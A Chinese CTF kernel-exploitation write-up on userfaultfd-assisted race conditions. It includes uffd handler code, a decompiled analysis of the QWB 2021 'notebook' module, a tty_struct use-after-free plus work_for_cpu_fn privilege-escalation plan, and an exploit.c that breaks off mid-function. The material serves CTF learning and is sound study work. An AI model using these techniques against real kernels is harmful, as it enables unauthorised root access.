kernel-条件竞争-userfaultfd
userfaultfd
准确来说 userfaultfd 并非是一种利用手法,只是 Linux 的一个系统调用,通过 userfaultfd 这种机制,用户可以通过自定义的 page fault handler 在用户态处理缺页异常。当用户态“接管”某段虚拟内存的缺页异常(page fault)之后,内核再访问这段内存时,内核线程会被强制挂起,直到用户态决定“什么时候、用什么数据”把页补上(也就是异常处理)。
userfaultfd 的整体流程如下:

(copy的图,图源于https://arttnba3.cn/2021/03/03/PWN-0X00-LINUX-KERNEL-PWN-PART-I/#userfaultfd%EF%BC%88may-obsolete%EF%BC%89)
how should we use?
要想使用 userfaultfd 系统调用,我们首先要注册一个 userfaultfd,通过 ioctl 监视一块内存区域,同时还需要专门启动一个用以进行轮询的线程uffd monitor,该线程会通过poll()函数不断轮询直到出现缺页异常
当有一个线程在这块内存区域内触发缺页异常时(比如说第一次访问一个匿名页),该线程(称之为 faulting 线程)进入到内核中处理缺页异常
内核会调用
handle_userfault()交由 userfaultfd 处理随后 faulting 线程进入堵塞状态,同时将一个
uffd_msg发送给 monitor 线程,等待其处理结束monitor 线程调用通过 ioctl 处理缺页异常,有如下选项:
UFFDIO_COPY:将用户自定义数据拷贝到 faulting page 上UFFDIO_ZEROPAGE:将 faulting page 置 0UFFDIO_WAKE:用于配合上面两项中UFFDIO_COPY_MODE_DONTWAKE和UFFDIO_ZEROPAGE_MODE_DONTWAKE模式实现批量填充
在处理结束后 monitor 线程发送信号唤醒 faulting 线程继续工作
以上便是 userfaultfd 这个机制的整个流程,该机制最初被设计来用以进行虚拟机 / 进程的迁移等用途,但是通过这个机制我们可以控制进程执行流程的先后顺序,从而使得对条件竞争的利用成功率大幅提高,比如在如下的操作时:
copy_from_user(kptr, user_buf, size);如果在进入函数后,实际拷贝开始前线程被中断换下 CPU,别的线程执行,修改了 kptr 指向的内存块的所有权(比如 kfree 掉了这个内存块),然后再执行拷贝时就可以实现 UAF。这种可能性当然是比较小的,但是如果 user_buf 是一个 mmap 的内存块,并且我们为它注册了 userfaultfd,那么在拷贝时出现缺页异常后此线程会先执行我们注册的处理函数,在处理函数结束前线程一直被暂停,结束后才会执行后面的操作,大大增加了竞争的成功率。
具体用法:
考虑在内核模块当中有一个菜单堆的情况,其中的操作都没有加锁,或者仅仅只加了读锁的情况,那么便存在条件竞争的可能,考虑如下竞争情况:
线程1不断地分配和编辑堆块
线程2不断地释放堆块
线程3分配堆块
此时线程1便有可能编辑到被释放的堆块!!!
考虑这样的一个情况
我们先使用线程1分配堆块,但是在线程1编辑这个堆块之前,使用线程2将这个堆块给释放了,
在线程二将这个堆块指针赋值为0之前立刻切换到线程3,使用线程3将这个被释放的堆块申请到了合适的位置(比如说 tty_operations),
紧接着使用线程1的编辑功能,那么我们便可以完成对该堆块的重写,从而进行下一步利用。
当然上面的是理想情况,实际上很难有这么好的条件让我们来实现这样的操作,而且命中的几率是比较低的,我们也很难判断是否命中(简直是废话)
但假如线程1使用诸如copy_from_user、copy_to_user等方法在用户空间与内核空间之间拷贝数据,那么我们便可以:
先使用 mmap 分一块匿名内存,为其注册 userfaultfd,由于我们是使用 mmap 分配的匿名内存,此时该块内存并没有实际分配物理内存页
线程1在内核中在这块内存与内核对象间进行数据拷贝,在访问注册了 userfaultfd 内存时便会触发缺页异常,陷入阻塞,控制权转交 userfaultfd 的 uffd monitor 线程
在 uffd monitor 线程中我们便能利用多线程的PV操作(计操最有用的一集)对线程1正在操作的内核对象进行恶意操作(例如像上面我说的那样对线程1正在读写的内核对象释放掉后再分配到我们想要的地方)
此时再让线程1继续执行,线程 1 便会向我们想要写入的目标写入特定数据/从我们想要读取的目标读取特定数据了
至此,我们便成功利用 userfaultfd 完成了对条件竞争漏洞的利用,这项技术的存在使得条件竞争的命中率大幅提高
首先先定义一些外面接下来需要用到的数据结构
#include <sys/types.h>
#include <stdio.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <poll.h>
void errExit(char * msg)
{
puts(msg);
exit(-1);
}
//...
long uffd; /* userfaultfd file descriptor */
char *addr; /* Start of region handled by userfaultfd */
unsigned long len; /* Length of region handled by userfaultfd */
pthread_t thr; /* ID of thread that handles page faults */
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;接着,程序通过 ioctl(uffd, UFFDIO_API, &uffdio_api) 对刚刚创建的 userfaultfd 进行初始化。这里的作用可以理解为与内核进行一次 API 协商并正式启用该 userfaultfd 对象:uffdio_api.api 指定了所使用的 userfaultfd 接口版本(UFFD_API),而 features 置为 0 表示不启用额外的扩展功能。只有在这一步成功之后,内核才会真正开始通过该 userfaultfd 向用户态发送缺页异常相关的事件,否则该文件描述符是不可用的。
随后,程序通过 mmap 创建了一段匿名的私有内存映射。由于使用了 MAP_ANONYMOUS | MAP_PRIVATE 标志,这块内存并不对应任何实际文件,并且采用**按需分配(demand paging)**的方式:在 mmap 返回时,仅仅建立了虚拟地址到内存区域的映射关系,实际的物理页尚未分配。也就是说,在程序首次访问这段内存时,会触发一次缺页异常。
结合前面创建并启用的 userfaultfd,可以将这一过程理解为:我们人为地准备了一段“必然会触发 page fault 的内存区域”,并且将其缺页异常的处理权交由用户态控制。在后续代码中,当有线程访问该地址时,内核会暂停该线程并通过 userfaultfd 通知用户态,从而为后续精确控制执行时序(例如构造 race condition 或 UAF 利用窗口)提供基础条件。
/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1)
errExit("userfaultfd");
uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
errExit("ioctl-UFFDIO_API");
/* Create a private anonymous mapping. The memory will be
demand-zero paged--that is, not yet allocated. When we
actually touch the memory, it will be allocated via
the userfaultfd. */
len = 0x1000;
addr = (char*) mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (addr == MAP_FAILED)
errExit("mmap");接着,程序通过 ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) 将前面使用 mmap 创建的那一段匿名内存区域注册到 userfaultfd 中。这里可以理解为:我们显式告诉内核,这一段虚拟地址范围内产生的缺页异常,需要交由该 userfaultfd 对象来处理。
uffdio_register.range.start指定了需要被监控的内存起始地址range.len指定了监控的内存长度,也就是将整个新创建的映射区间完整地纳入 userfaultfd 的管理范围。mode被设置为UFFDIO_REGISTER_MODE_MISSING,表示只关心尚未分配物理页的缺失页(missing pages)。。当程序首次访问这些页面、触发缺页异常时,内核不会立即为其分配物理页,而是暂停触发异常的线程,并通过 userfaultfd 向用户态发送相应的事件通知。
从整体逻辑上看,这一步相当于将一段“尚未被实际使用的内存”与前面创建的 userfaultfd 进行绑定。在此之后,这段内存的首次访问时机、缺页异常的处理顺序,都可以由我们来控制。
/* Register the memory range of the mapping we just created for
handling by the userfaultfd object. In mode, we request to track
missing pages (i.e., pages that have not yet been faulted in). */
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
errExit("ioctl-UFFDIO_REGISTER");接着,程序通过 pthread_create 创建了一个新的线程--monitor 轮询线程,用于专门处理来自 userfaultfd 的事件。到启动 monitor 轮询线程这一步,整个 userfaultfd 的启动流程就结束了,接下来便是等待缺页异常的过程
/* Create a thread that will process the userfaultfd events */
int s = pthread_create(&thr, NULL, fault_handler_thread, (void *) uffd);
if (s != 0) {
errExit("pthread_create");
}monitor 轮询线程应当定义如下形式,这里给出的是 UFFD_COPY,即将自定义数据拷贝到 faulting page 上:
在线程启动后,通过 poll 阻塞式监听 userfaultfd,当被注册的内存区域首次被访问并触发 page fault 时,内核会向该 fd 投递事件。线程随后通过 read 获取缺页异常信息,并确认事件类型为 UFFD_EVENT_PAGEFAULT。
在收到缺页事件后,monitor 线程通过 UFFDIO_COPY 将一页用户态准备好的数据拷贝到 faulting page 对应的虚拟地址中,从而完成缺页的实际填充并唤醒被挂起的执行线程。
static int page_size;
static void *
fault_handler_thread(void *arg)
{
static struct uffd_msg msg; /* Data read from userfaultfd */
static int fault_cnt = 0; /* Number of faults so far handled */
long uffd; /* userfaultfd file descriptor */
static char *page = NULL;
struct uffdio_copy uffdio_copy;
ssize_t nread;
page_size = sysconf(_SC_PAGE_SIZE);
uffd = (long) arg;
/* Create a page that will be copied into the faulting region */
if (page == NULL)
{
page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (page == MAP_FAILED)
errExit("mmap");
}
/* Loop, handling incoming events on the userfaultfd
file descriptor */
for (;;)
{
/* See what poll() tells us about the userfaultfd */
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if (nready == -1)
errExit("poll");
printf("\nfault_handler_thread():\n");
printf(" poll() returns: nready = %d; "
"POLLIN = %d; POLLERR = %d\n", nready,
(pollfd.revents & POLLIN) != 0,
(pollfd.revents & POLLERR) != 0);
/* Read an event from the userfaultfd */
nread = read(uffd, &msg, sizeof(msg));
if (nread == 0)
{
printf("EOF on userfaultfd!\n");
exit(EXIT_FAILURE);
}
if (nread == -1)
errExit("read");
/* We expect only one kind of event; verify that assumption */
if (msg.event != UFFD_EVENT_PAGEFAULT)
{
fprintf(stderr, "Unexpected event on userfaultfd\n");
exit(EXIT_FAILURE);
}
/* Display info about the page-fault event */
printf(" UFFD_EVENT_PAGEFAULT event: ");
printf("flags = %llx; ", msg.arg.pagefault.flags);
printf("address = %llx\n", msg.arg.pagefault.address);
/* Copy the page pointed to by 'page' into the faulting
region. Vary the contents that are copied in, so that it
is more obvious that each fault is handled separately. */
memset(page, 'A' + fault_cnt % 20, page_size);
fault_cnt++;
uffdio_copy.src = (unsigned long) page;
/* We need to handle page faults in units of pages(!).
So, round faulting address down to page boundary */
uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
~(page_size - 1);
uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
errExit("ioctl-UFFDIO_COPY");
printf(" (uffdio_copy.copy returned %lld)\n",
uffdio_copy.copy);
}
}有人可能注意到了uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address & ~(page_size - 1);这个奇怪的句子,在这里作用是将触发缺页异常的地址按页对齐作为后续拷贝的起始地址,实际上我没注意到,但是arttnba3** 佬 **的博客里说了我也记录一下
比如说触发的地址可能是 0xdeadbeef,直接从这里开始拷贝一整页的数据就拷歪了,应当从 0xdeadb000 开始拷贝(假设页大小 0x1000)
一个例子:
#include <sys/types.h>
#include <stdio.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <poll.h>
static int page_size;
void errExit(char * msg)
{
printf("[x] Error at: %s\n", msg);
exit(-1);
}
static void *
fault_handler_thread(void *arg)
{
static struct uffd_msg msg; /* Data read from userfaultfd */
static int fault_cnt = 0; /* Number of faults so far handled */
long uffd; /* userfaultfd file descriptor */
static char *page = NULL;
struct uffdio_copy uffdio_copy;
ssize_t nread;
uffd = (long) arg;
/* Create a page that will be copied into the faulting region */
if (page == NULL)
{
page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (page == MAP_FAILED)
errExit("mmap");
}
/* Loop, handling incoming events on the userfaultfd
file descriptor */
for (;;)
{
/* See what poll() tells us about the userfaultfd */
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if (nready == -1)
errExit("poll");
printf("\nfault_handler_thread():\n");
printf(" poll() returns: nready = %d; "
"POLLIN = %d; POLLERR = %d\n", nready,
(pollfd.revents & POLLIN) != 0,
(pollfd.revents & POLLERR) != 0);
/* Read an event from the userfaultfd */
nread = read(uffd, &msg, sizeof(msg));
if (nread == 0)
{
printf("EOF on userfaultfd!\n");
exit(EXIT_FAILURE);
}
if (nread == -1)
errExit("read");
/* We expect only one kind of event; verify that assumption */
if (msg.event != UFFD_EVENT_PAGEFAULT)
{
fprintf(stderr, "Unexpected event on userfaultfd\n");
exit(EXIT_FAILURE);
}
/* Display info about the page-fault event */
printf(" UFFD_EVENT_PAGEFAULT event: ");
printf("flags = %llx; ", msg.arg.pagefault.flags);
printf("address = %llx\n", msg.arg.pagefault.address);
/* Copy the page pointed to by 'page' into the faulting
region. Vary the contents that are copied in, so that it
is more obvious that each fault is handled separately. */
memset(page, 'A' + fault_cnt % 20, page_size);
fault_cnt++;
uffdio_copy.src = (unsigned long) page;
/* We need to handle page faults in units of pages(!).
So, round faulting address down to page boundary */
uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
~(page_size - 1);
uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
errExit("ioctl-UFFDIO_COPY");
printf(" (uffdio_copy.copy returned %lld)\n",
uffdio_copy.copy);
}
}
int main(int argc, char ** argv, char ** envp)
{
long uffd; /* userfaultfd file descriptor */
char *addr; /* Start of region handled by userfaultfd */
unsigned long len; /* Length of region handled by userfaultfd */
pthread_t thr; /* ID of thread that handles page faults */
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
page_size = sysconf(_SC_PAGE_SIZE);
/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1)
errExit("userfaultfd");
uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
errExit("ioctl-UFFDIO_API");
/* Create a private anonymous mapping. The memory will be
demand-zero paged--that is, not yet allocated. When we
actually touch the memory, it will be allocated via
the userfaultfd. */
len = 0x1000;
addr = (char*) mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (addr == MAP_FAILED)
errExit("mmap");
/* Register the memory range of the mapping we just created for
handling by the userfaultfd object. In mode, we request to track
missing pages (i.e., pages that have not yet been faulted in). */
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
errExit("ioctl-UFFDIO_REGISTER");
/* Create a thread that will process the userfaultfd events */
int s = pthread_create(&thr, NULL, fault_handler_thread, (void *) uffd);
if (s != 0)
errExit("pthread_create");
/* Trigger the userfaultfd event */
void * ptr = (void*) *(unsigned long long*) addr;
printf("Get data: %p\n", ptr);
return 0;
}
注意,这个操作在5.11之后就没有了这是因为在较新版本的内核中修改了变量sysctl_unprivileged_userfaultfd的值:
来自 linux-5.11 源码
fs/userfaultfd.c:
int sysctl_unprivileged_userfaultfd __read_mostly;
//...
SYSCALL_DEFINE1(userfaultfd, int, flags)
{
struct userfaultfd_ctx *ctx;
int fd;
if (!sysctl_unprivileged_userfaultfd &&
(flags & UFFD_USER_MODE_ONLY) == 0 &&
!capable(CAP_SYS_PTRACE)) {
printk_once(KERN_WARNING "uffd: Set unprivileged_userfaultfd "
"sysctl knob to 1 if kernel faults must be handled "
"without obtaining CAP_SYS_PTRACE capability\n");
return -EPERM;
}
//...来自 linux-5.4 源码fs/userfaultfd.c:
int sysctl_unprivileged_userfaultfd __read_mostly = 1;
//...可以看到,在之前的版本5.4当中sysctl_unprivileged_userfaultfd这一变量被初始化为1,而在较新版本如5.11的内核当中这一变量并没有被赋予初始值,编译器会将其放在 bss 段,默认值为 0
这意味着在较新版本内核中只有 root 权限才能使用 userfaultfd,倒霉!
CTF 中的 userfaultfd 板子
但是旧版本中使用这个还是相当方便的,这里给出arttnba3佬给出的板子:(这一部分直接抄的arttnba3佬的博客,侵删)
static pthread_t monitor_thread;
void errExit(char * msg)
{
printf("[x] Error at: %s\n", msg);
exit(EXIT_FAILURE);
}
void registerUserFaultFd(void * addr, unsigned long len, void (*handler)(void*))
{
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;
/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1)
errExit("userfaultfd");
uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
errExit("ioctl-UFFDIO_API");
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
errExit("ioctl-UFFDIO_REGISTER");
s = pthread_create(&monitor_thread, NULL, handler, (void *) uffd);
if (s != 0)
errExit("pthread_create");
}在使用时直接调用即可:
registerUserFaultFd(addr, len, handler);需要注意的是 handler 的写法,这里直接照抄 Linux man page 改了改,可以根据个人需求进行个性化改动:
static char *page = NULL; // 你要拷贝进去的数据
static long page_size;
static void *
fault_handler_thread(void *arg)
{
static struct uffd_msg msg;
static int fault_cnt = 0;
long uffd;
struct uffdio_copy uffdio_copy;
ssize_t nread;
uffd = (long) arg;
for (;;)
{
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
/*
* [在这停顿.jpg]
* 当 poll 返回时说明出现了缺页异常
* 你可以在这里插入一些比如说 sleep() 一类的操作
*/
if (nready == -1)
errExit("poll");
nread = read(uffd, &msg, sizeof(msg));
if (nread == 0)
errExit("EOF on userfaultfd!\n");
if (nread == -1)
errExit("read");
if (msg.event != UFFD_EVENT_PAGEFAULT)
errExit("Unexpected event on userfaultfd\n");
uffdio_copy.src = (unsigned long) page;
uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
~(page_size - 1);
uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
errExit("ioctl-UFFDIO_COPY");
}
}例题解析:
老样子使用一道例题来结束这个手法的学习:强网杯2021线上赛 - notebook
浅析题目
首先看一下启动脚本:
stty intr ^]:把 中断键(interrupt key) 从默认的
Ctrl+Cexec timeout 300:最多运行 300 秒(5 分钟)
开了 smap、smep、kaslr 保护
#!/bin/sh
stty intr ^]
exec timeout 300 qemu-system-x86_64 -m 1024M -kernel bzImage -initrd rootfs.cpio -append "loglevel=3 console=ttyS0 oops=panic panic=1 kaslr" -nographic -net user -net nic -device e1000 -smp cores=2,threads=2 -cpu kvm64,+smep,+smap -monitor /dev/null 2>/dev/null -s查看/sys/devices/system/cpu/vulnerabilities/*

开启了 KPTI (内核页表隔离)
这里为了方便调试,将前面的这一部分都删除
查看漏洞模块:
程序注册一个 misc 设备(是 Linux 内核提供的一种 “快速注册字符设备” 的机制, 即简化版的字符设备注册接口。),初始化一个 读写锁 **lock,**并自定义了 ioctl、read、write 三个接口

内存关系图:
/dev/notebook
|
v
mynote_dev (data)
|
v
mynote_fops (rodata)
|
+--> mynote_write
|
+--> mynote_ioctl
|
+--> noteadd
+--> notedel
+--> noteedit
+--> notegift程序定义了一个结构体note的数组notebook,有着两个成员:size 存储堆块的大小,buf 存储指向堆块的地址


题目设备通过 ioctl 模拟了一个堆,提供了创建、编辑、释放堆块的功能,以及一个gift模块

noteadd
分析一下这一部分:
notebook 最多 16 个元素
用读锁保护写操作,之后保存旧 size,然后直接覆盖
只能申请不大于 0x60 的 object,不过并不会直接拷贝数据到 object 中,而是会拷贝到
name字符型数组这里的(void *)_kmalloc(size, 0x24000C0);中的0x24000C0代表标准分配标志,即GFP_KERNEL
__int64 __fastcall noteadd(size_t idx, size_t size, void *buf)
{
__int64 v3; // rdx
__int64 v4; // r13
note *v5; // rbx
size_t size_1; // r14
__int64 v7; // rbx
_fentry__();
if ( idx > 0xF )
{
v7 = -1;
printk("[x] Add idx out of range.\n", size);
}
else
{
v4 = v3;
v5 = ¬ebook[idx];
raw_read_lock(&lock);
size_1 = v5->size;
v5->size = size;
if ( size > 0x60 )
{
v5->size = size_1;
v7 = -2;
printk("[x] Add size out of range.\n", size);
}
else
{
copy_from_user(&name, v4, 0x100);
if ( v5->note )
{
v5->size = size_1;
v7 = -3;
printk("[x] Add idx is not empty.\n", v4);
}
else
{
v5->note = (void *)_kmalloc(size, 0x24000C0);
printk("[+] Add success. %s left a note.\n", &name);
v7 = 0;
}
}
raw_read_unlock(&lock);
}
return v7;
}noteedit
在整个编辑过程中依然使用
raw_read_lock来保护对共享对象的修改操作,包括更新note->size、调用krealloc以及重写note->note指针。若是 size 不同则会调用 krealloc,并将用户空间数据拷贝 256 字节至全局变量 name 中
edit 不会限制 size 大小,因此虽然 add 限制了 size,但是通过 edit 我们仍能获得任意大小的 object
edit 使用的是读锁,可以多个进程并发
realloc(buf, 0),从而通过条件竞争达到 use after free 的效果
__int64 __fastcall noteedit(size_t idx, size_t newsize, void *buf)
{
__int64 v3; // rdx
__int64 v4; // r13
note *v5; // rbx
size_t size; // rax
note *note; // r12
__int64 n2; // rbx
_fentry__();
if ( idx > 0xF )
{
n2 = -1;
printk("[x] Edit idx out of range.\n", newsize);
return n2;
}
v4 = v3;
v5 = ¬ebook[idx];
raw_read_lock(&lock);
size = v5->size;
v5->size = newsize;
if ( size == newsize )
{
n2 = 1;
goto editout;
}
note = (note *)((__int64 (__fastcall *)(void *, size_t, __int64))&krealloc)(v5->note, newsize, 37748928);
copy_from_user(&name, v4, 256);
if ( !v5->size )
{
printk("free in fact", v4);
v5->note = 0;
n2 = 0;
goto editout;
}
// 检查这个虚拟地址是否落在内核“线性映射(direct mapping)”区域内,并且能被转换成一个物理地址。
if ( (unsigned __int8)_virt_addr_valid(note) )
{
v5->note = note;
n2 = 2;
editout:
raw_read_unlock(&lock);
printk("[o] Edit success. %s edit a note.\n", &name);
return n2;
}
printk("[x] Return ptr unvalid.\n", v4);
raw_read_unlock(&lock);
return 3;
}notedele
用来释放 object
notedel允许的最大索引是0x10,存在越界的风险notedel()函数中若是 size 为 0 则不会清空但是由于之前的操作都是remalloc(size)和kmalloc(size),
kmalloc(0)和kralloc(0)并不会分配一个 object,所以这里也没有什么用
__int64 __fastcall notedel(size_t idx)
{
__int64 v1; // rsi
note *v2; // rbx
_fentry__();
if ( idx > 0x10 )
{
printk("[x] Delete idx out of range.\n", v1);
return -1;
}
else
{
raw_write_lock(&lock);
v2 = ¬ebook[idx];
kfree(v2->note);
if ( v2->size )
{
v2->size = 0;
v2->note = 0;
}
raw_write_unlock(&lock);
printk("[-] Delete success.\n", v1);
return 0;
}
}notegift
直接打印出我们分配的 object 的地址
__int64 __fastcall notegift(void *buf)
{
__int64 v1; // rsi
_fentry__();
printk("[*] The notebook needs to be written from beginning to end.\n", v1);
copy_to_user(buf, notebook, 256);
printk("[*] For this special year, I give you a gift!\n", notebook);
return 100;
}注意:
在上面的分析中,我们得到不同操作中存在读写锁,不过 add 和 edit 占用的是读位,而 delete 占用的是写位
读锁可以被多个进程使用,多个进程此时可以同时进入临界区(此时没有任何写者持锁),而写锁只能被一个进程使用,只有一个进程能够进入临界区
mynote_read
简单实现了将
read系统调用的第三个参数作为 note 的索引,从全局notebook结构体数组中取出对应条目,使用该条目中记录的size作为读取长度,并将note指针所指向的内核内存内容拷贝到用户态。存在边界错误的风险
ssize_t __fastcall mynote_read(file *file, char *buf, size_t idx, loff_t *pos)
{
unsigned __int64 n0x10; // rdx
unsigned __int64 n0x10_1; // rdx
size_t size; // r13
note *note; // rbx
_fentry__();
if ( n0x10 > 0x10 )
{
printk("[x] Read idx out of range.\n", buf);
return -1;
}
else
{
n0x10_1 = n0x10;
size = notebook[n0x10_1].size;
note = (note *)notebook[n0x10_1].note;
_check_object_size(note, size, 1);
copy_to_user(buf, note, size);
printk("[*] Read success.\n", note);
return 0;
}
}mynote_write
实现了向指定 note 中写入内容的功能,其基本行为与
mynote_read对称:将write系统调用的第三个参数作为索引,从全局notebook结构体数组中取出对应条目,并使用该条目中记录的size作为写入长度,将用户态数据拷贝到内核中保存的 note 缓冲区。存在边界错误的风险
ssize_t __fastcall mynote_write(file *file, const char *buf, size_t idx, loff_t *pos)
{
unsigned __int64 n0x10; // rdx
unsigned __int64 n0x10_1; // rdx
size_t size; // r13
note *note; // rbx
_fentry__();
if ( n0x10 > 0x10 )
{
printk("[x] Write idx out of range.\n", buf);
return -1;
}
else
{
n0x10_1 = n0x10;
size = notebook[n0x10_1].size;
note = (note *)notebook[n0x10_1].note;
_check_object_size(note, size, 0);
if ( copy_from_user((userarg *)note, buf, size) )
printk("[x] copy from user error.\n", buf);
else
printk("[*] Write success.\n", buf);
return 0;
}
}漏洞利用
userfaultfd构造UAF
注意到在 mynote_edit 当中使用了 krealloc 来重分配 object,随后使用 copy_fom_user 从用户空间拷贝数据:

那么我们可以:分配一个特定大小的 note,新开 edit 线程通过
krealloc(0)将其释放,并通过 userfaultfd 卡在这里,此时 notebook 数组中的 object 尚未被清空,仍是原先被释放了的 object,我们只需要再将其分配到别的内核结构体上便能完成 UAF接下来我们就要选择 victim struct 了,这里我们还是选择最经典的
tty_struct来完成利用,我们只需要打开/dev/ptmx便能获得一个tty_struct
泄露内核地址
由于题目提供了读取堆块的功能,故我们可以直接通过
tty_struct中的tty_operations泄露内核基地址,其通常被初始化为全局变量ptm_unix98_ops或pty_unix98_ops开启了 kaslr 的内核在内存中的偏移依然以内存页为粒度,故我们可以通过比对 tty_operations 地址的低三16进制位来判断是
ptm_unix98_ops还是pty_unix98_ops这是因为这两个是静态常量,因此可以在vmlinux的符号表中找到,其地址与基址的差值固定:(直接从/proc/kallsyms这里面读取就好)
static const struct tty_operations ptm_unix98_ops = { .lookup = ptm_unix98_lookup, .install = pty_unix98_install, .remove = pty_unix98_remove, .open = pty_open, .close = pty_close, .write = pty_write, .write_room = pty_write_room, .flush_buffer = pty_flush_buffer, .chars_in_buffer = pty_chars_in_buffer, .unthrottle = pty_unthrottle, .ioctl = pty_unix98_ioctl, .compat_ioctl = pty_unix98_compat_ioctl, .resize = pty_resize, .cleanup = pty_cleanup, .show_fdinfo = pty_show_fdinfo, }; static const struct tty_operations pty_unix98_ops = { .lookup = pts_unix98_lookup, .install = pty_unix98_install, .remove = pty_unix98_remove, .open = pty_open, .close = pty_close, .write = pty_write, .write_room = pty_write_room, .flush_buffer = pty_flush_buffer, .chars_in_buffer = pty_chars_in_buffer, .unthrottle = pty_unthrottle, .set_termios = pty_set_termios, .start = pty_start, .stop = pty_stop, .cleanup = pty_cleanup, };需要注意的是题目模块中的读写功能会检查 notebook 数组中的 size,而在我们通过
krealloc(0)构建 UAF 时其被修改为 0,故我们需要将其修改回非 0 值注意到
noteadd()中会先修改 notebook 的 size 再copy_from_user(),这给了我们利用 userfaultfd 的机会:我们可以通过noteadd()将 size 修改回非 0 值并通过 userfaultfd 将其卡住(否则我们的 UAF object 指针会被新分配的 object 覆盖)
劫持 tty_operations,控制内核执行流,work_for_cpu_fn() 稳定化利用
由于题目提供了写入堆块的功能,故我们可以直接通过修改
tty_struct->tty_operations后操作 tty(例如read、write、ioctl…这会调用到函数表中的对应函数指针)的方式劫持内核执行流,同时notegift()会白给出 notebook 里存的 object 的地址,那么我们可以直接把fake tty_operations布置到 note 当中现在我们考虑如何进行提权的工作,按惯例我们需要
commit_creds(prepare_kernel_cred(NULL)),不过我们很难直接一步执行到位,因此需要分步执行并保存中间结果,这里我们选择使用work_for_cpu_fn()完成利用,在开启了多核支持的内核中都有这个函数,定义于kernel/workqueue.c中:struct work_for_cpu { struct work_struct work; long (*fn)(void *); void *arg; long ret; }; static void work_for_cpu_fn(struct work_struct *work) { struct work_for_cpu *wfc = container_of(work, struct work_for_cpu, work); wfc->ret = wfc->fn(wfc->arg); }这段代码基于 Linux 内核的 workqueue(工作队列)机制,其核心目的是将一个函数调用封装为异步任务,在合适的内核上下文中执行,并保存其返回结果。该函数可以理解为如下形式:
static void work_for_cpu_fn(size_t * args) { args[6] = ((size_t (*) (size_t)) (args[4](args[5])); }即
rdi + 0x20处作为函数指针执行,参数为rdi + 0x28处值,返回值存放在rdi + 0x30处,而tty_operations上的函数指针的第一个参数大都是tty_struct,对我们而言是可控的,由此我们可以很方便地分次执行 prepare_kernel_cred 和 commit_creds,且不用考虑 KPTI 绕过,直接普通地返回用户态便能完成稳定化提权
1. get a tty-size object
利用如下脚本来实现一个tty-size的大小的chunk的申请:
// gcc exploit.c -static -masm=intel -g -o exploit
#include "kpwn.h"
#define ptm_unix98_ops 0xffffffff81e8e440
#define pty_unix98_ops 0xffffffff81e8e320
#define commit_creds 0xffffffff810a9b40
#define work_for_cpu_fn 0xffffffff8109eb90
#define prepare_kernel_cred 0xffffffff810a9ef0
#define TTY_STRUCT_SIZE 0x2e0
#define NOTE_NUM 0x10
struct chunk {
size_t index;
size_t size;
char *buf;
};
struct Notebook{
void *ptr;
size_t size;
};
int note_fd;
sem_t evil_add_sem, evil_edit_sem;
char *uffd_buf;
char temp_page[0x1000] = { "arttnba3" };
void add(size_t index,size_t size,char *buf)
{
struct chunk note = {
.index = index,
.size = size,
.buf = buf,
};
